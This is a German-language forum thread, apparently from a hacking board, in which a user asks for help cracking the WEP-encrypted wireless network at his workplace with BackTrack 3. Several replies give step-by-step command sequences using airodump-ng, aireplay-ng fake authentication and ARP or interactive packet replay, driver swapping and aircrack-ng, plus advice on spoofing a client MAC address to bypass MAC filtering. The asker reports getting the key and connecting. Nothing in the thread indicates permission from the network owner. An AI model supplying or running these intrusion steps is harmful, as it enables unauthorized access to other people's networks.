hi leute,

zuerst mal, juhui, mein 1ter post, LOL.

also nun zu meinem prob. bin ned wirklich sehr informiert, über backtrack, wlan, etc. aber sehr intressiert und neugierig neue sachen zu lernen ;)

also, sitz in der firma und würd gern ne wep leitung mit wep verschlüsselung knacken. bssid, essid, alles bekannt, nur das pw eben ned... hab mir bt 3 gezogen (hatte auch schon mal mit bt2 "herumexperimentiert") und jede menge tuts.

fahre hoch mit bt und such mal netzwerke, finde auch welche bla bla.

hab den tuts entsprechend gearbeitet, funzt aber ned. ich finde die nw zwar und krieg "antworten"
da ich die eine felhermeldung bekomme die nach macaddresstausch und dem restart von wlan0 bekomme, (iw.tar.bz2 installen) dachte ich mir es liegt warscheinlich an der wlan karte. ha ned intel pro 3945ABG. da ich mich zu wenig mit linux auskenne und das eben ned installieren kann, hab ich nach alternativen gesucht um die karte zum laufen zu bringen. da hab ich auch einiges gefunden und habs ausprobiert ;) hab mit modprobe nen andren treiber geladen und wieder probiert das wep zu knacken. wieder der gleiche mist. kann das wlan finden, bssid, essid, mac adresse aber krieg beim aerodump und beim arieplay keine pakete zum "cracken"....

bin schon am verzweifeln... hab nen screeny angehängt damit ihr seht welchen bockmist ich da zam dreh ;););)

pls, help, und ja ich weis mein erster post ist gleich ein "wie hack ich wlan" post, sry, aber ich hab wirklich viel herumprobiert...

mfg samse

http://img388.imageshack.us/img388/6259/backtrack4snapshot1jw6.th.jpg (http://img388.imageshack.us/my.php?image=backtrack4snapshot1jw6.jpg)

hmmm
lass mal den machchanger weg und wieso startest du eig airmon?
den brauchste dazu eig garned

moment ich schreib nen kurztut dazu...

//EDIT:

WEP Cracking Kurztut by DbnS
###################
wlan0: Your WirelessLAN Device

SHELL1: iwconfig wlan0 mode monitor
SHELL1: kismet

#Choose your target and extract the following Information:
#BSSID : [example] 00:1C:4A:47:2E:3B
#Channel :[example] 6

#Now close Kismet by Ctrl-C
[SHELL1] airodump-ng --ivs --channel 6 -w /root/collect wlan0
[NEW SHELL2] aireplay-ng --fakeauth 1 -a 00:1C:4A:47:2E:3B wlan0
[NEW SHELL3] aireplay-ng --arpreplay -b 00:1C:4A:47:2E:3B wlan0

#On slow connection
[NEW SHELLx] iwconfig wlan0 rate auto

#On Error messages:
[NEW SHELLx] newsh aireplay-ng --fakeauth 1 -a 00:1C:4A:2E:3B wlan0

# #DATA will increase slowly at the beginning but this will speed up with the time

#WEP128:
#Collect about 500.000 #DATA packets
#WEP64
#Collect about 100.000 #DATA packets

#When finished [you may close the other shells now]
[NEW SHELLx] aircrack-ng /root/collect-01.ivs

#VERY NICE TUTS @ irongeek.com


Funzt bei mir (BT3 Final, realtek Chipset) einwandfrei

hallo sam_semillia!
na wie gehts deinem board?! ;-)

klick mal den grauen link in meiner signatur an

@ dbns:

vielen dank für deine schnelle hilfe. aber irgendwie glaub ich grad ned dass das bei mir funzt. hier is mal ein aktueller screeny.
http://img299.imageshack.us/img299/6374/snapshot2ei3.th.jpg (http://img299.imageshack.us/my.php?image=snapshot2ei3.jpg)

er liest die pakete zwar aber kann die ned "verarbeiten". oder mach ich nur kacke???

@maoshe: danke für den link. werd mir das tut mal am abend reinziehen, wie gesaggtt, bin in der firma, hab keinen ton, un d es kommt irgendwie blöd wenn ich "fernschau" ;)

aja, und welches forum meinst du????


mfg samse

hmm du solltest nur einen channel auf einmal "abhoeren" sonst gibts probleme, also den airodump im vordergrund closen
ansionsten siehts ganz gut aus, er associated sich....
den aircrack erst wenn die #data dinger da sind :)
hmmm und das "Received ACKs" sollte sich erhoehen....

ok, hab aerodump ganz vorne geclosed, damit er nicht mehr mehrere abhoert, und den aerodump im hintergrund auch, auch wenn der nichts mehr getan hat ;) muss ich jetzt die befehle neu starten oder is das egal?

und die received acks, ist das "(got 0 ARP requests and 0 ACKs)" ????

screeny:
http://img206.imageshack.us/img206/8611/snapshot3cv7.th.jpg (http://img206.imageshack.us/my.php?image=snapshot3cv7.jpg)

ich weis, stell mich an wie ein voll noob, tut mir auch wirklich leid ;))))

danke, mfg sam

du brauchst nur den airodump auf dem kanal wo der ap sendet
weil nur da musst du ja die data capturen

und das mit den received acks is das (got 0 ARP requests and 0 ACKs) jo

das sollte hochgehn wenn der fakeauth auf aireplay laeuft

ja er läuft auf kanal 11, hab grad beendet und neu egstartet. da stand dass er auf channel 11 ist. deswegen wunderts mich auch so dass die acks sich überhaupt nicht erhöhen. sind jetzt schon augf 130.000 packets...

mfg

//edit: hab beide befehle nochmal gestartet um mir die befehle anzusehen, müssten beide stimmen, sind wie dbei dir!

ich meinte dein kiffer-board^^ wieso ist das so schnell weg gewesen?

edit: du brauchst eh keinen ton für mein tut. is alles geschrieben, was erklärt gehört

sry, aber ich hatte nie ein kiffer board ;) musst einen andren sam meinen. ich war eher bei andren sachen/brads aktiv.

sodale, irgendwie funzt es ned. hab vllt nen tippfehler oder ähnliches. werde rebooten und alles nochmal durchgehen so wie bei deinem tut. dann meld ich mich wieder.

frage: wie lange sollte das dauern bis er das pw hat?? laut andren tuts und "textbeiträgen" ca 10-15 min. kommt das hin??

info: hab heute noch die neuesten intel treiber für die karte installed.

mfg samse

hmjo kommt drauf an normalerweise brauch ich so ca ne halbe stunde, bei freundlichen netzen warens schon 5 minuten^^

sodawasser, ich hab jetzt rebootet und alles neu gestartet.

hier ein screeny:
http://img175.imageshack.us/img175/2595/snapshot6vn3.th.jpg (http://img175.imageshack.us/my.php?image=snapshot6vn3.jpg)

aber ich hätte noch kurz ein paar fragen dazu:

kismet: wozu genau brauch ich das??? ich hol mir die daten über das netz mit
airodump-ng wlan0


airodump-ng --ivs --channel 11 -w /root/collect wlan0
wozu brauch ich den befehl? sagt mir der dass er dort die pakete "sammelt" bzw die infos? weil den schließ ich ja auch gleich wieder, so wie du gesagt hast.

mfg samse

@samse: du hattest ein kifferboard! - www.kiffers-paradise.de war die url.
samse alias colaweizen alias dominic

du musst es ja nicht abstreiten^^

@samse: du hattest ein kifferboard! - www.kiffers-paradise.de war die url.
samse alias colaweizen alias dominic

du musst es ja nicht abstreiten^^


nöööööö das war ned ich, ich bin schon immer sam_semillia. samse schreib ich erst seit nem jahr oder 2 mit mfg weil, weis n ed warum, warscheinlichen wegen SAM_SEmillia ;) ich wüsste wenn ich das board gehabt hätte, ehrlich ;)

mfg samse


//edit: und colaweizen und dominic sagt mir auch gar nüx ;)

airodump-ng --ivs --channel 11 -w /root/collect wlan0
das is der eigentliche 'recorder', den nich schliessen xD

ahja und statt kismet geht natuerlich auch airodump, das must du aber dann auch ausmachen beim capturen

und den aircrack erst am ende wenn du genug #data hast

ahhh kk ;)


so nochmal neu gestartet. dies 3 befehle werden jetzt ausgeführt:

http://img55.imageshack.us/img55/3392/snapshot7zn9.th.jpg (http://img55.imageshack.us/my.php?image=snapshot7zn9.jpg)

http://img149.imageshack.us/img149/8289/snapshot8lh3.th.jpg (http://img149.imageshack.us/my.php?image=snapshot8lh3.jpg)

also der /rooT collect
fakeauth
und arpreplay

stimmt das jetzt so????

ich krieg nämlich schon wieder keine acks....


mfg sam

Nimm einfach den Ipwraw-Treiber, dann klappts auch mit den Nachbarn!

Kurzanleitung:

1. Gewünschtes Netzwerk raussuchen, MAC des APs notieren, Channel notieren mit:

airodump-ng wlan0

2. Ipwraw-Treiber laden:

modprobe -r iwl3945
modprobe ipwraw
Kein airmon oder sonstwas ausführen! Die Karte ist nun automatisch im Monitor-Mode!
Du hast nun 2 Devices: wifi0 und rtap0

3. wifi0 einstellen:


//wifi0 deaktivieren
ifconfig wifi0 down
//MAC des APs eingeben
nano /sys/class/net/wifi0/device/bssid
//Channel eingeben
nano /sys/class/net/wifi0/device/channel
//Rate auf 2 setzen
nano /sys/class/net/wifi0/device/rate
//Optional die MAC von wifi0 ändern (bietet sich an, weil schneller einzutippen)
macchanger -m 00:11:22:33:44:55 wifi0
//wifi0 aktivieren
ifconfig wifi0 up

4. Airodump-ng nur nach Daten aus dem gewünschten Netzwerk scannen lassen:

airodump-ng -c <channel> --bssid <AP MAC> -w out wifi0

5. Mit dem AP authentifizieren:

aireplay-ng -1 0 -a <AP MAC> -h <wifi0 MAC (00:11:22:...)> wifi0

6. Jetzt kann unterschieden werden ob ein Client zum AP verbunden ist. Dann ist eine andere Möglichkeit den AP zum aussenden von IVs zu bringen gegeben. Ich beziehe mich auf die Möglichkeit, die meistens und auch wenn kein Client verbunden ist, funktioniert. Falls diese Attacke nicht klappen sollte, informier dich auf der aircrack-ng Seite über die Fragmentation- und ChopChop-Attacke oder warte auf einen Client und machs so, wie du vor hattest.

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <AP MAC> -h <wifi0 MAC> wifi0

7. Bei genügend Paketen aircrack-ng anwerfen.

aircrack-ng out-01.cap (das -w Argument bei airodump-ng legt den Namen der Capture-Datei fest)

Wenn man sich nun zu dem Netzwerk verbinden will, werden allerdings die iwl3945-Treiber benötigt, also:

modprobe -r ipwraw
modprobe iwl3945

Somit hab ich wohl auch das Mini-Tutorial geschrieben... Falls ein Mod Lust dazu hat, kann er den Beitrag ja in die Tutorialfore verschieben. Wenn nicht, solls mir wurst sein. :P

Gruss

@ludenjupp: danke, kanns leider heute nicht mehr porobieren. werds montag morgen gleich austesten und laufen lassen, mal schaun obs klappt. bin schon leicht am verzweifeln ;)

werde mich montag wieder da melden, würd euch bitten kurz reinzusehen, obs gefunzt hat, wenn ned glaub ich eh dass ich schön langsam aufgeb ;)

vielen dank an euch alle ;)


aja und schönes verlängertes weekend ;)


mfg samse

airodump-ng --ivs --channel 11 -w /root/collect wlan0
das is der eigentliche 'recorder', den nich schliessen xD

ahja und statt kismet geht natuerlich auch airodump, das must du aber dann auch ausmachen beim capturen

und den aircrack erst am ende wenn du genug #data hast

wenn ich sowas lese bekomm ich ne kleine Kriese.

der Parameter --ivs ist schwachsinn und veraltet, er speichert dann NUR die IVS, das dauert dann zu lange.

ich guck gleich nochmal ob ich irgendwie besseren empfang hab dann dreh ich mal was, mit der stummel antenne reichts irgendwie nicht :(!

@graf: wolltest du nicht mal ein tut machen, wei man mit bt3 alleine wep-verschlüsselte netzwerke knacken kann?

wollen schon nur da ich selber keinen WLan router habe und die stummel antenne nix bringt, muss ich warten bis ich wieder Kohle habe :P

b2t:

WHITLIST mal angucken!

für 5€ kannst du dir selbst eine antenne bauen^^
http://free-hack.com/viewtopic.php?t=56409

junge was willst du mit den beacons, die iv sind was zaehlt, was anderes brauchste gar nich collecten du vogel.
so sparste wenigstens speicherplatz

dbns halt besser den Mund.

für PTW brauch man alles nicht nur die IVs und das ist weitwaus schneller als normal zu cracken, also nenn mich nicht Vogel.

und BTW bei backtrack ist der speicherplatz egal, da beim ausschalten eh alles wiped wird, und die 10kb mehr oder weniger machen es auch nicht schlimm!

hab bei mir auch die ipwraw treiber installiert allerdings gibt es kein wifi0 oder rtap0
airmon-ng zeig mir ne leere liste an
weiss net mehr was ich machen soll probier schon seit tagen

@ludenjupp, danke nochmals für das minitut. wie versporochen hab ichs heut probiert, mehrmals sogar ;) funzt aber irgendwie trotzdem ned. kein plan warum. hab auch die chop attacke mit dem -4 probiert.

bekomm aber auch ned folgendes wie auf der aurcrack seite beschrieben:



Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F

Use this packet ? y


hier mal ein screeny.
http://img367.imageshack.us/img367/8351/snapshot1gm9.th.jpg (http://img367.imageshack.us/my.php?image=snapshot1gm9.jpg)

bin echt schon am verzweifeln ;)

mfg samse

//edit: hab jetzt 10.000 ivs. aber er findet kein pw. abwarten und tee trinken. mal schaun was raus kommt ;)
mfg

//edit2: 150.000 ivs aber kein key ;)
mfg

//edit3: 230.000 ivs und kein pw, is das normal?
mfg

//edit4: über 300.000 ivs aber kein pw.
hier mal ein akteueller screeny.
http://img380.imageshack.us/img380/2921/snapshot2fa8.th.jpg (http://img380.imageshack.us/my.php?image=snapshot2fa8.jpg)


stimmt das so??

mfg

benutzt du die -IVS Option bei airodum-ng wenn ja kann es sein das du ne million brauchst!

nein, machs genau so wie ludenjupp beschrieben hat!!

mfg

/edit: neu gestartet. befehle genau wie bei ludenjupp, bis auf mac, die hab ich geändert auf 00:11:21:31:41:51. bei aireplay werd ich ned authenticated. also mach ichs mit der andren methode von ludenjupp. da krieg ich ich zwar ivs aber des dauert ewig.

aktueller screeny.
http://img171.imageshack.us/img171/1849/snapshot2wx1.th.jpg (http://img171.imageshack.us/my.php?image=snapshot2wx1.jpg)
befehle sollten alle ersichtlich sein.

mfg

btw du kannst die *.cap Dateien immerwieder verwenden :P also musste nicht wieder bei 0 anfangen.

und es kann sein das du ne million IVs brauchts kann aber auch seind as du nur 500k brauchst..

liegt an was das fürn key ist und wie gut die passphrase ist!

aber wieso kann ich diesesmal ned authenticated werden bzw wieso komm ich von den 30 ivs ned weg, bzw bekomm mehr??

mfg

anscheinend hat er nen MAC filter aktiv oder hat den ap weiter wech gestellt!



aireplay-ng -1 0 -a <BSSID> wifi0 sollte ausreichen^^

wenn er macfilter aktiv hat wirste nicht drumherum kommen den client zu finden und seine mac zu spoofen!

so, ein neuer tag, ein neuer versuch.

heute mal mit bt3 beta!!!! weis ned warum, aber irgendwie wollt ichs mal versuchen. hat auch alles toll geklappt, bisher.

aireplay-ng, airodump, und aircrack. die "data" steigt an und er probiert das pw herauszufiltern.

aktueller screeny:
http://img511.imageshack.us/img511/5633/snapshot1kz3.th.jpg (http://img511.imageshack.us/my.php?image=snapshot1kz3.jpg)

dazu hätt ich noch ein paar fragen:

GELB: die destination MAC, woher kommt die? sollte die nicht gleich meiner local MAC sein????

ROT: bei airreplay, bietet er mir ja pakete an, mehrere und ich kann aussuchen welches ich verwenden will. gibts dabei unterschiede?? bzw welches sollte ma nehmen? ich denke er bietet jedes mal 8 pakete an, ich hab dieses mal paket 2!

GRÜN: sollte airreplay bei dem command nicht automatisch wiederholen??

so, das wars fürs erste, akteuller stand, 95.000iv, aber kein pw!!!


THX 4 HELP ;)
mfg samse

Added after 21 minutes:

sry 4 doppelpost, ABER, ich habs geschafft ;) wep key gefunden, unter bt3 BETA!!! dann gleich getestet und es funzt ;)

nun hab ich noch ned frage: kann ich den key irgendwie in ein windowsformat ändern? damit ich unter xp ins wlan und inet kann??

und weiters noch die frage, kann ich die mac meines leppis unter xp ändern?????

hier ein screeny vom key ;)

http://img380.imageshack.us/img380/2802/snapshot2ol5.th.jpg (http://img380.imageshack.us/my.php?image=snapshot2ol5.jpg)

*VORFREUDEHIMMELHOCHJAUCHZENDHERUMSPRING* *ggg*


mfg samse

Added after 28 minutes:

hat sich erledigt, FUNZT EINWANDFREI!!!!

besten dank leute, wobei mich immer noch irritiert warum die beta besser funzte als die final???? irgendwer ne idee???

mfg sam

besten dank leute, wobei mich immer noch irritiert warum die beta besser funzte als die final???? irgendwer ne idee???

Das ist ja auch ein Trugschluss. In der Final wird deine Karte von vornherein unterstützt. Nur für den Monitor-Mode und die Injection brauchst du eben den anderen Treiber. Klappt bestens mit der Final!